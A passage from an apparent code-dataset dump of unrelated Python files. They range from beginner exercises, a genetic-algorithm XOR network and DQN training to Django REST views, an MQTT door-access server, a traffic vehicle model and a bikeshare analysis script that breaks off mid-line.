x\nprint(\"Summen av de\", x, \"første tallene er\", a)\n\nb = 0\nc = 1\nwhile c < 1000:\n b +=1\n c = c*b\n\nprint(\"Løkken kjørte\", b, \"ganger, produktet ble\", c)\n\nahm = 0\nwhile ahm != 12:\n ahm = int(input(\"Hva er 3*4? \"))\nprint(\"Stemmer, svaret var\", ahm)\n","sub_path":"1.semester/ITGK/Øvinger/Øving 3/merløkker.py","file_name":"merløkker.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"26129361","text":"\n\nfrom xai.brain.wordbase.nouns._jackal import _JACKAL\n\n#calss header\nclass _JACKALS(_JACKAL, ):\n\tdef __init__(self,): \n\t\t_JACKAL.__init__(self)\n\t\tself.name = \"JACKALS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"jackal\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_jackals.py","file_name":"_jackals.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"312596095","text":"from baselines import deepq\nfrom baselines.common.atari_wrappers_deprecated import wrap_dqn, ScaledFloatFrame\nimport baselines.AirSimDiscPhys as AirSimDiscPhys\nfrom baselines.AirSimDisc import AirSimDisc\nfrom baselines.AirSimEnvFollow import AirSimEnv\nfrom baselines.AirSimPhysFollow import AirSimPhys\n\ndef main():\n env = AirSimPhys()\n #env = AirSimDisc()\n #env = AirSimDiscPhys.AirSimEnv()\n #env = ScaledFloatFrame(wrap_dqn(env))\n model = deepq.models.cnn_to_mlp_custom(\n convs=[(32, 8, 4), (64, 4, 2), (64, 3, 1)],\n hiddens=[4096, 4096, 4096],\n dueling=True\n )\n # 2,000,000 original\n act = deepq.learn(\n env,\n q_func=model,\n lr=1e-4,\n max_timesteps=1000000,\n buffer_size=1000,\n exploration_fraction=0.1,\n exploration_final_eps=0.01,\n train_freq=4,\n checkpoint_freq=1000,\n learning_starts=10000,\n target_network_update_freq=1000,\n gamma=0.99,\n prioritized_replay=True\n )\n act.save(\"airsim_model.pkl\")\n env.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"baselines/deepq/experiments/airsim/train_airsim.py","file_name":"train_airsim.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"358502968","text":"import numpy as np\nimport random\nfrom deap import algorithms, base, creator, tools\n#this script uses DEAP library to train a fully-connected neural network to solve the 'XOR' problem\n#XOR definition: (0,0)->0, (1,0)->1, (0,1)->1, (1,1)->0\n\n#activation function for neural network\ndef sigmoid(z,deriv):\n if(deriv):\n return z(1-z)\n\n return 1/(1+np.exp(-z))\n\n#evaluates each set of wiehgts based on performance for XOR\ndef evalWeights(individual):\n #holds all possible inputs (including bias)\n possibleValues = np.matrix([[0,1,0,1],\n [0,0,1,1],\n [1,1,1,1]])\n\n idealMatrix = np.matrix([[0],[1], [1], [0]])\n\n #holds weights by which inputs will be multiplied\n weightsMatrix = np.matrix([[individual[0],individual[2], individual[6]],\n [individual[1],individual[3],individual[7]],\n [0,0,1]])\n\n #multiplies inputs by weights to yield first hidden layer in neural network\n layer1 = sigmoid((np.dot(weightsMatrix,possibleValues)), False)\n\n #holds the second set of weights, by which hidden layer will be multiplied\n weightsMatrix2 = np.matrix([[individual[5], individual[4], individual[8]]])\n\n #holds output of neural networks\n outputMatrix = sigmoid(np.dot(weightsMatrix2,layer1), False)\n\n #compares ouput to ideal output to assign fitness\n fit1 = (outputMatrix[0,0])**2\n fit2 = (outputMatrix[0,1]-1)**2\n fit3 = (outputMatrix[0,2]-1)**2\n fit4 = (outputMatrix[0,3])**2\n\n fitness = fit1+fit2+fit3+fit4\n\n return (fitness,)\n\n\n#configures all properties of DEAP library\ncreator.create(\"FitnessMin\", base.Fitness, weights = (-1.0,))\ncreator.create(\"Individual\", list, fitness = creator.FitnessMin)\ntb = base.Toolbox()\ntb.register(\"floatAttribute\", random.uniform,-1,1)\ntb.register(\"individual\", tools.initRepeat, creator.Individual, tb.floatAttribute, n=9)\ntb.register(\"population\", tools.initRepeat, list, tb.individual, n = 200)\ntb.register(\"evaluate\", evalWeights)\ntb.register(\"mate\", tools.cxTwoPoint)\ntb.register(\"mutate\", tools.mutGaussian, mu=0.0, sigma=0.2, indpb = 0.05)\ntb.register(\"select\", tools.selTournament, tournsize = 3)\ntb.register(\"map\", map)\n\n#creates initial population and evolves it based on fitness\ncxpb , mutpb, ngen = .05, .05, 400\npop = tb.population()\npop = algorithms.eaSimple(pop,tb,cxpb,mutpb,ngen)\n\nweightsList = pop[0][0]\n\ndef defineXOR(x,y):\n #checks to ensure proper input for function\n if( (x!=0 and x!=1) or (y!=0 and y!=1)):\n return \"Please input either a 1 or 0 for x and y.\"\n\n #input values\n possibleValues = np.matrix([[x],\n [y],\n [1]])\n idealMatrix = np.matrix([[0],[1], [1], [0]])\n\n #first weights matrix\n weightsMatrix = np.matrix([[weightsList[0],weightsList[2], weightsList[6]],\n [weightsList[1],weightsList[3],weightsList[7]],\n [0,0,1]])\n\n #values for first hidden layer\n layer1 = sigmoid((np.dot(weightsMatrix,possibleValues)),False)\n\n #second weights matrix\n weightsMatrix2 = np.matrix([[weightsList[5], weightsList[4], weightsList[8]]])\n\n #output value\n outputMatrix = sigmoid(np.dot(weightsMatrix2,layer1), False)\n\n if outputMatrix >= .5:\n return True\n if outputMatrix < .5:\n return False\n\nprint(defineXOR(0,0))\nprint(defineXOR(1,0))\nprint(defineXOR(0,1))\nprint(defineXOR(1,1))\nprint(defineXOR(.5,-150))\n\n'''\nideal results:\n0\n1\n1\n0\n'''\n","sub_path":"DEAP_XOR.py","file_name":"DEAP_XOR.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425186452","text":"from remoteomddata.api.serializers.productcategory import ProductCategoryCUSerializer, ProductCategoryDetailSerializer, ProductCategoryListSerializer\nfrom rest_framework.generics import (\n CreateAPIView,\n DestroyAPIView,\n ListAPIView, \n RetrieveAPIView,\n RetrieveUpdateAPIView\n )\nfrom rest_framework.permissions import (\n AllowAny,\n IsAuthenticated,\n IsAdminUser,\n IsAuthenticatedOrReadOnly,\n\n )\n\nfrom remoteomddata.api.permissions import IsOwnerOrReadOnly\nfrom remoteomddata.models.productcategory import ProductCategory\n\n\nclass ProductCategoryCreateAPIView(CreateAPIView):\n queryset = ProductCategory.objects.all()\n serializer_class = ProductCategoryCUSerializer\n permission_classes = [IsAuthenticated]\n\n def perform_create(self, serializer):\n serializer.save()\n\n\nclass ProductCategoryDetailAPIView(RetrieveAPIView):\n queryset = ProductCategory.objects.all()\n serializer_class = ProductCategoryDetailSerializer\n lookup_field = 'id'\n #lookup_url_kwarg = \"abc\"\n\n\nclass ProductCategoryUpdateAPIView(RetrieveUpdateAPIView):\n queryset = ProductCategory.objects.all()\n serializer_class = ProductCategoryCUSerializer\n lookup_field = 'id'\n permission_classes = [IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]\n #lookup_url_kwarg = \"abc\"\n def perform_update(self, serializer):\n serializer.save(user=self.request.user)\n #email send_email\n\n\n\nclass ProductCategoryDeleteAPIView(DestroyAPIView):\n queryset = ProductCategory.objects.all()\n serializer_class = ProductCategoryDetailSerializer\n lookup_field = 'id'\n #lookup_url_kwarg = \"abc\"\n\nclass ProductCategoryListAPIView(ListAPIView):\n queryset = ProductCategory.objects.all()\n serializer_class = ProductCategoryListSerializer\n\n #def get_queryset()\n\n\n\n","sub_path":"django/remoteomd-old/remoteomddata/api/views/productcategory.py","file_name":"productcategory.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"527578169","text":"import os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\nimport sendgrid_helper\nimport logging\n\n\ndef login():\n # Set basicconfig to log events of relatively low severity level (Info) to higher severity level (Error)\n logging.basicConfig(level=logging.INFO)\n logging.info(\"Logging into stackoverflow.com\")\n\n chrome_options = Options()\n chrome_options.binary_location = os.environ.get('GOOGLE_CHROME_SHIM')\n driver = webdriver.Chrome(chrome_options=chrome_options)\n\n try:\n driver.get(\"https://stackoverflow.com\")\n\n driver.find_element_by_link_text(\"Log in\").click()\n\n driver.find_element_by_id(\"email\").send_keys(os.environ['STACK_OVERFLOW_EMAIL'])\n driver.find_element_by_id(\"password\").send_keys(os.environ['STACK_OVERFLOW_PASSWORD'])\n driver.find_element_by_id(\"submit-button\").submit()\n\n driver.find_element_by_class_name(\"my-profile\").click()\n\n elem = driver.find_element_by_class_name(\"mini-avatar\")\n assert os.environ['STACK_OVERFLOW_DISPLAY_NAME'] in elem.text\n logging.info(\"Logged into stackoverflow.com and accessed profile page. \")\n\n except Exception as e:\n message = \"An error occurred while trying to access stackoverflow.com!\"\n logging.error(message, e)\n sendgrid_helper.send_mail(\"Error at login!\", message + str(e))\n\n finally:\n driver.close()\n\n\nif __name__ == \"__main__\":\n login()\n","sub_path":"stack_overflow_page.py","file_name":"stack_overflow_page.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"158128216","text":"\"\"\" This module implements a vehicle model.\n\n Vehicle model acts as an instance to modify vehicle's behaviour according to \n\"\"\"\n\nfrom typing import Dict, List\nfrom collections import OrderedDict\nimport itertools\nimport numpy as np\nimport pandas as pd\n\nfrom symupy.utils import constants as ct\n\nfrom .dynamics import VehicleDynamic\n\n\nclass Vehicle(object):\n \"\"\"Class for defining a vehicle\n \"\"\"\n\n counter = itertools.count()\n\n def __init__(\n self,\n abscisa=0.0,\n acceleration=0.0,\n distance=0.0,\n vehid=0,\n ordinate=0.0,\n link=\"\",\n vehtype=\"\",\n speed=0.0,\n lane=0,\n elevation=0.0,\n dynamic=VehicleDynamic(),\n itinerary=[],\n ):\n \"\"\" This initializer creates a Vehicle\n \"\"\"\n self.abscisa = abscisa\n self.acceleration = acceleration\n self.distance = distance\n self.vehid = vehid\n self.ordinate = ordinate\n self.link = link\n self.vehtype = vehtype\n self.speed = speed\n self.lane = lane\n self.elevation = elevation\n self.dynamic = dynamic\n self.itinerary = itinerary\n\n def __repr__(self):\n data_dct = \", \".join(f\"{k}:{v}\" for k, v in self.__dict__.items())\n return f\"{self.__class__.__name__}({data_dct})\"\n\n def __str__(self):\n data_dct = \", \".join(f\"{k}:{v}\" for k, v in self.__dict__.items())\n return f\"{self.__class__.__name__}({data_dct})\"\n\n def update_state(self, dataveh):\n \"\"\"Updates data within the structure with \n \n :param dataveh: vehicle \n :type dataveh: Vehicle\n \"\"\"\n self.__dict__.update(**dataveh)\n\n link = getattr(self, \"link\")\n if link not in getattr(self, \"itinerary\"):\n self.itinerary.append(link)\n\n @property\n def C(self):\n \"\"\"Output matrix\"\"\"\n return self.__output_matrix\n\n def activate_sensor(self, **kwargs) -> None:\n \"\"\"Define the observation matrix and observed states in the vehicle\n \n vehicle.activate_sensor(speed=True,position=True)\n \n :return: Set the observation matrix __output_matrix\n :rtype: None\n \"\"\"\n dct_idx = {\"position\": 0, \"speed\": 1, \"acceleration\": 2}\n C = np.zeros([len(kwargs.keys()), 3])\n for key in kwargs.keys():\n idx = dct_idx.get(key)\n C[idx][idx] = kwargs.get(key, 0)\n self.__output_matrix = C\n\n @property\n def vector_state(self) -> np.array:\n \"\"\"Vehicle state vector (x,v,a)\"\"\"\n return np.array((self.distance, self.speed, self.acceleration))\n\n @property\n def observed_state(self) -> np.array:\n \"\"\" Return observed states via C@(x,v,a)\"\"\"\n return self.C @ self.vector_state\n\n def predict_state(self, control) -> np.array:\n \"\"\" Return predicted states via self.dynamic\"\"\"\n return self.dynamic(self, control)\n\n @staticmethod\n def format_dict(dataveh: OrderedDict) -> dict:\n \"\"\" This function creates the dictionary \n {\"abscisa\": float(data),\n \"acceleration\": float(data),\n \"distance\": float(data),\n \"vehid\": int(data),\n \"ordinate\": float(data),\n \"link\": str (data),\n \"vehtype\": str (data),\n \"speed\": float(data),\n \"lane\": int (data),\n \"elevation\": float(data),\n } \n \n :param dataveh: Ordered Dictionary from XML query\n :type dataveh: OrderedDict\n :return: Dictionary as in description\n :rtype: [type]\n \"\"\"\n data = {ct.FIELD_DATA[key]: ct.FIELD_FORMAT[key](val) for key, val in dataveh.items()}\n return data\n\n @classmethod\n def from_response(cls, dataveh: OrderedDict):\n \"\"\"Constructor for the class from a specific dictionary\n \n :param dataveh: Ordered dictionary from XML query\n :type dataveh: OrderedDict\n :return: Vehicle object\n :rtype: [type]\n \"\"\"\n return cls(**Vehicle.format_dict(dataveh))\n\n\nlstordct = List[OrderedDict]\nlstvehs = List[Vehicle]\n\n\nclass VehicleList(object):\n \"\"\"Class for defining a list of vehicles\n \"\"\"\n\n def __init__(self, newvehs: lstvehs):\n self.vehicles = {}\n for veh in newvehs:\n self.vehicles[veh.vehid] = veh\n\n def update_list(self, current_vehs: lstordct):\n \"\"\" Appends a new list of vehicles\n\n :param vehlist: List of vehicles\n :type vehlist: lstordct\n \"\"\"\n # Reformating data in vehicle dict\n current_vehs = [Vehicle.format_dict(veh) for veh in current_vehs]\n\n for veh in current_vehs:\n veh_id = veh.get(\"vehid\")\n if veh_id in self.vehicles.keys():\n # Update existing vehicle\n self.vehicles.get(veh_id).update_state(veh)\n else:\n # Create a new vehicle and append\n self.vehicles[veh_id] = Vehicle(**veh)\n\n def _get_vehicles_attribute(self, attribute: str) -> np.array:\n \"\"\" Retrieve list of parameters \n \n :param attribute: One of the vehicles attribute e.g. 'distance'\n :type attribute: str\n :return: vector of all parameters\n :rtype: np.array\n \"\"\"\n constructor, ftype = ct.FIELD_FORMATAGG[attribute]\n if ftype:\n return constructor([getattr(veh, attribute) for veh in self], dtype=ftype)\n return [getattr(veh, attribute) for veh in self] # Case str\n\n @property\n def acceleration(self):\n return self._get_vehicles_attribute(\"acceleration\")\n\n @property\n def speed(self):\n return self._get_vehicles_attribute(\"speed\")\n\n @property\n def distance(self):\n return self._get_vehicles_attribute(\"distance\")\n\n def _to_pandas(self) -> pd.DataFrame:\n \"\"\" Transforms vehicle list into a pandas for rendering purposes \n \n :return: Returns a table with pandas data.\n :rtype: pd.DataFrame\n \"\"\"\n\n df_print = pd.DataFrame()\n for key, value in self.vehicles.items():\n df_print = df_print.append(pd.DataFrame(value.__dict__, index=(key,)))\n return df_print\n\n def __str__(self):\n if not self.vehicles:\n return \"No vehicles have been registered\"\n df_to_print = self._to_pandas()\n return str(df_to_print)\n\n def __repr__(self):\n if not self.vehicles:\n return \"No vehicles have been registered\"\n df_to_print = self._to_pandas()\n return repr(df_to_print)\n\n def __iter__(self):\n self.iterveh = iter(self.vehicles.values())\n return self\n\n def __next__(self):\n return next(self.iterveh)\n\n def __contains__(self, veh: Vehicle):\n return veh.vehid in self.get_vehid\n\n def __getitem__(self, key: int):\n return self.vehicles[key]\n\n @classmethod\n def from_request(cls, vehlistdct: lstordct):\n \"\"\"Constructs a vehicle list from a list of ordered dictionaries (simulator repsonse)\n\n :param vehlist: list containing vehicle data in ordered dict format\n :type vehlist: list\n :return: vehicle list containing list of vehicle data classes\n :rtype: VehicleList\n \"\"\"\n return cls([Vehicle.from_response(d) for d in vehlistdct])\n\n @property\n def get_vehid(self):\n return [v.vehid for v in self.vehicles]\n","sub_path":"symupy/components/vehicles/models/vehicles.py","file_name":"vehicles.py","file_ext":"py","file_size_in_byte":7545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"405609710","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/7/18 4:26 PM\n# @Author : zhongch4g\n# @Site : \n# @File : 101. Symmetric Tree.py\n# @Software: IntelliJ IDEA\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def isSymmetric(self, root: TreeNode) -> bool:\n # boundary case\n if not root:\n return True\n\n return self.compare(root.left, root.right)\n\n def compare(self, left, right):\n if not left and not right:\n return True\n\n if left and right and left.val == right.val and \\\n self.compare(left.left, right.right) and \\\n self.compare(left.right, right.left):\n return True\n else:\n return False\n\n # Iterative\n def isSymmetric2(self, root: TreeNode) -> bool:\n if not root:\n return True\n stack = [root.left, root.right]\n while stack:\n node1, node2 = stack.pop(), stack.pop()\n if not node1 and not node2:\n continue\n if not node1 or not node2:\n return False\n if node1.val != node2.val:\n return False\n stack.append(node1.right)\n stack.append(node2.left)\n stack.append(node1.left)\n stack.append(node2.right)\n return True\n\n\n\nnode1 = TreeNode(1)\nnode2, node3 = TreeNode(2), TreeNode(2)\nnode4, node5 = None, TreeNode(3)\nnode6, node7 = None, TreeNode(3)\nnode1.left, node1.right = node2, node3\nnode2.left, node2.right = node4, node5\nnode3.left, node3.right = node6, node7\n\nsolution = Solution()\nres = solution.isSymmetric2(node1)\nprint(res)\n\n","sub_path":"LeetCode/101. Symmetric Tree.py","file_name":"101. Symmetric Tree.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"34345229","text":"import json\n\nimport pytest\nfrom streamsets.testframework.decorators import stub\n\n\n@pytest.mark.parametrize('stage_attributes', [{'action': 'KEEP'},\n {'action': 'REMOVE'},\n {'action': 'REMOVE_CONSTANT'},\n {'action': 'REMOVE_EMPTY'},\n {'action': 'REMOVE_NULL'},\n {'action': 'REMOVE_NULL_EMPTY'}])\ndef test_action(sdc_builder, sdc_executor, stage_attributes):\n try:\n DATA = dict(name='Al Gore', birthplace='Washington, D.C.', winningYears=None, internetPatents='')\n\n # We'll keep the /name field.\n EXPECTED_KEEP_DATA = dict(name='Al Gore')\n # We'll remove the /name field.\n EXPECTED_REMOVE_DATA = dict(birthplace='Washington, D.C.',\n winningYears=None,\n internetPatents='')\n # We'll ask to remove all fields but set constant to his name.\n EXPECTED_REMOVE_CONSTANT_DATA = dict(birthplace='Washington, D.C.',\n winningYears=None,\n internetPatents='')\n # We'll ask to remove all fields, but only the ones that have empty string values (/internetPatents) will.\n EXPECTED_REMOVE_EMPTY_DATA = dict(name='Al Gore',\n birthplace='Washington, D.C.',\n winningYears=None)\n # We'll ask to remove all fields, but only the ones that have null values (/winningYears) will.\n EXPECTED_REMOVE_NULL_DATA = dict(name='Al Gore',\n birthplace='Washington, D.C.',\n internetPatents='')\n\n # We'll ask to remove all fields, but only the ones that have empty string or null values will.\n EXPECTED_REMOVE_NULL_EMPTY_DATA = dict(name='Al Gore',\n birthplace='Washington, D.C.')\n\n pipeline_builder = sdc_builder.get_pipeline_builder()\n\n dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')\n dev_raw_data_source.data_format = 'JSON'\n dev_raw_data_source.raw_data = json.dumps(DATA)\n\n field_remover = pipeline_builder.add_stage('Field Remover').set_attributes(**stage_attributes)\n if field_remover.action in ('KEEP', 'REMOVE'):\n field_remover.fields = ['/name']\n else:\n field_remover.fields = ['/name', '/birthplace', '/winningYears', '/internetPatents']\n if field_remover.action == 'REMOVE_CONSTANT':\n field_remover.constant = 'Al Gore'\n\n trash = pipeline_builder.add_stage('Trash')\n\n dev_raw_data_source >> field_remover >> trash\n pipeline = pipeline_builder.build()\n\n sdc_executor.add_pipeline(pipeline)\n snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot\n record = snapshot[field_remover].output[0]\n assert record.field == locals()[f\"EXPECTED_{field_remover.action}_DATA\"]\n finally:\n sdc_executor.stop_pipeline(pipeline)\n\n\n@pytest.mark.parametrize('stage_attributes', [{'action': 'REMOVE_CONSTANT'}])\ndef test_constant(sdc_builder, sdc_executor, stage_attributes):\n \"\"\":py:function:`stage.configuration.test_field_remover_processor.test_action` covers this case\n as we set the remover to remove all fields, but only provide a constant that matches one.\"\"\"\n test_action(sdc_builder, sdc_executor, stage_attributes)\n\n\ndef test_fields(sdc_builder, sdc_executor):\n \"\"\":py:function:`stage.configuration.test_field_remover_processor.test_action` covers this case\n as we alternately set one field (when keeping or removing individual ones) or all of them.\"\"\"\n test_action(sdc_builder, sdc_executor, dict(action='REMOVE'))\n\n\n@stub\ndef test_preconditions(sdc_builder, sdc_executor):\n pass\n\n\n@stub\ndef test_required_fields(sdc_builder, sdc_executor):\n pass\n\n","sub_path":"stage/configuration/test_field_remover_processor.py","file_name":"test_field_remover_processor.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17365057","text":"\"\"\"microbial URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\n\nfrom .views import MetafileTemplView, UnMetafileListView, SheetNameView, SheetHeaderView, UploadMetafileView, SubmitMetadataView\n\nurlpatterns = [\n path('metafiletmpl', MetafileTemplView.as_view(), name='metafile_templ'),\n path('metafilelist', UnMetafileListView.as_view(), name='metafile_list'),\n path('sheetlist', SheetNameView.as_view(), name='sheet_list'),\n path('sheetheader', SheetHeaderView.as_view(), name='sheet_header'),\n path('metafile', UploadMetafileView.as_view(), name='metafile'),\n path('submit', SubmitMetadataView.as_view(), name='submit_metadata'),\n]\n","sub_path":"backend/metadata/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"31429503","text":"import Datebase\nimport csv\nfrom datetime import datetime\nfrom datetime import timedelta\nimport paho.mqtt.client as mqtt\n\n#Before_run read README.md\nbroker = \"###\"\nport = 8883\nmqttPassword = \"###\"\nclient = mqtt.Client()\n\ndef handleCloseUp(card_id, terminal_id):\n now = datetime.now()\n recvTimestamp = datetime.timestamp(now)\n cardUser = Datebase.getUserWithCardId(card_id)\n terminal = Datebase.getTerminalWithId(terminal_id)\n if cardUser is None:\n print(\"Card id not registered!\")\n Datebase.logForbiddenAttempt(recvTimestamp, card_id, terminal_id)\n elif terminal is None:\n print(\"Card close up to unregistered terminal!\")\n else:\n print(\"card id '{}' belong to '{}' spotted in terminal nr {} - description '{}', at {}\".format(cardUser.cardId, cardUser.name ,terminal.terminalId,terminal.terminalDescription,now.strftime(\"%d/%m/%Y, %H::%M::%S\")))\n Datebase.logDoorUsage(recvTimestamp, card_id, terminal_id)\n\ndef onMessage(client, userdata, message):\n message_decoded = (str(message.payload.decode(\"utf-8\"))).split(\".\")\n if message_decoded[0] == \"register\":\n Datebase.addNewTerminal(Datebase.Terminal(message_decoded[1], message_decoded[2]))\n client.publish(\"server/ack\", \"ack\" + \".\" + message_decoded[1])\n elif message_decoded[0] == \"closeup\":\n cardId = message_decoded[1]\n terminalId = message_decoded[2]\n handleCloseUp(cardId, terminalId)\n\t\t\ndef init():\n client.tls_set(\"ca.crt\")\n client.username_pw_set(username='server', password=mqttPassword)\n client.connect(broker,port)\n client.on_message = onMessage\n client.loop_start()\n client.subscribe(\"terminal/closeup\")\n client.subscribe(\"terminal/register\")\n\ndef addUser():\n name = input(\"Type name \")\n cardId = input(\"Type card id \")\n Datebase.addNewUser(Datebase.User(cardId,name))\n\ndef addTerminal():\n terminalId = input(\"Type terminal ID \")\n terminalDesc = input(\"Type terminal description \")\n Datebase.addNewTerminal(Datebase.Terminal(terminalId, terminalDesc))\n\ndef removeTerminal():\n terminalId = input(\"Type termina ID to delete \")\n Datebase.removeTerminalById(terminalId)\n\ndef removeUser():\n userName = input(\"Type user name to delete \")\n Datebase.removeUserByName(userName)\n\ndef generateRaport():\n userName = input(\"Type user name of which you want to create raport \")\n user = Datebase.getUserWithName(userName)\n userHistory = Datebase.getUserHistory(user)\n doorAccessTime = [item[1] for item in userHistory]\n entryTime = doorAccessTime[::2]\n exitTime = doorAccessTime[1::2]\n timeInWork = sum(exitTime) - sum(entryTime)\n workHours = timeInWork/3600\n with open('raport.csv', mode='a+', newline='') as logFile:\n logWriter = csv.writer(logFile, delimiter=',', quotechar='\"')\n logWriter.writerow([\"{}\".format(user.name), workHours])\n\noperationSwitch = {\n \"1\":addUser,\n \"2\":addTerminal,\n \"3\":removeUser,\n \"4\":removeTerminal,\n \"5\":generateRaport\n}\n\ndef mainLoop():\n print(\"Server options:\")\n print(\"\")\n print(\"1. to add new card\")\n print(\"2. to add new terminal\")\n print(\"3. to remove card (from datebase)\")\n print(\"4. to remove terminal (from datebase)\")\n print(\"5. to generate csv raport\")\n operation = input()\n operationSwitch[operation]()\n\nif __name__ == \"__main__\":\n init()\n while True:\n mainLoop()\n\n","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"554927231","text":"import time\nimport pandas as pd\nCITY_DATA = { 'chicago': pd.read_csv('chicago.csv'),\n 'new york city': pd.read_csv('new_york_city.csv'),\n 'washington': pd.read_csv('washington.csv')\n }\n########################## FUNCTION 1 ###########################\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('\\nHello! Let\\'s explore some US bikeshare data!')\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True:\n try :\n city = input('Which city would you like to explore? Chicago, New York City, or Washington? \\n').lower()\n if city in list(CITY_DATA.keys()):\n print('\\nYou are exploring {} .......... '.format(city))\n break\n else:\n print('\\nPlease enter a valid city name .\\nConsider typing one of these chicago,new york city or washington.')\n except Exception as e:\n print('Exception occurred {}'.format(e))\n print('\\nPlease enter a valid city name .\\nConsider typing one of these chicago,new york city or washington.\\n')\n\n # get user input for month (all, january, february, ... , june)\n while True:\n try :\n month = input(\"\\nPlease enter a month from ['january', 'february', 'march', 'april', 'may', 'june'] or all. \\n\").lower()\n if month in ['january', 'february', 'march', 'april', 'may', 'june','all']:\n print('\\nData will be filtered by {} ............'.format(month))\n break\n else:\n print(\"\\nPlease enter a valid month.\\nConsider one of the following ['january', 'february', 'march', 'april', 'may', 'june'] or all.\")\n except Exception as e :\n print('{} occurred.'.format(e))\n print(\"\\nPlease enter a valid month.\\nConsider one of the following ['january', 'february', 'march', 'april', 'may', 'june'] or all.\\n\")\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n while True:\n try :\n day = input('\\nPlease Enter the day you would like to see data for [Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday] or all. \\n').lower()\n if day in ['sunday','monday','tuesday','wednesday','thursday','friday','saturday','all']:\n print(\"\\nData is being filtered for {} .\".format(day))\n break\n else:\n print(\"\\nPlease enter a valid day.\\nConsider one of the following [Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday] or all.\\n\")\n except Exception as e :\n print('{} occurred.'.format(e))\n print(\"\\nPlease enter a valid day.\\nConsider one of the following [Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday] or all.\\n\")\n\n\n print('-'*40)\n return city, month, day\n\n######################## FUNCTION 2 #############################\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n df = pd.DataFrame(CITY_DATA.get(city))\n # Converting the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # Extracting month and day of week from Start Time column to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month) + 1\n\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day.title()]\n\n return df\n\n######################## FUNCTION 3 ##########################\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time() # For displaying time taken\n\n # display the most common month\n common_month = df['month'].mode()\n print('Most popular month : ',common_month)\n # display the most common day of week\n common_day_of_week = df['day_of_week'].mode()\n print('Most popular day of week : ',common_day_of_week)\n # display the most common start hour\n # creating an hour column\n df['hour'] = df['Start Time'].dt.hour\n common_hour = df['hour'].mode()\n print('Most popular hour : ',common_hour)\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n######################### FUNCTION 4 #########################\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n popular_start_station = df['Start Station'].mode()\n print('Most popular Start Station : 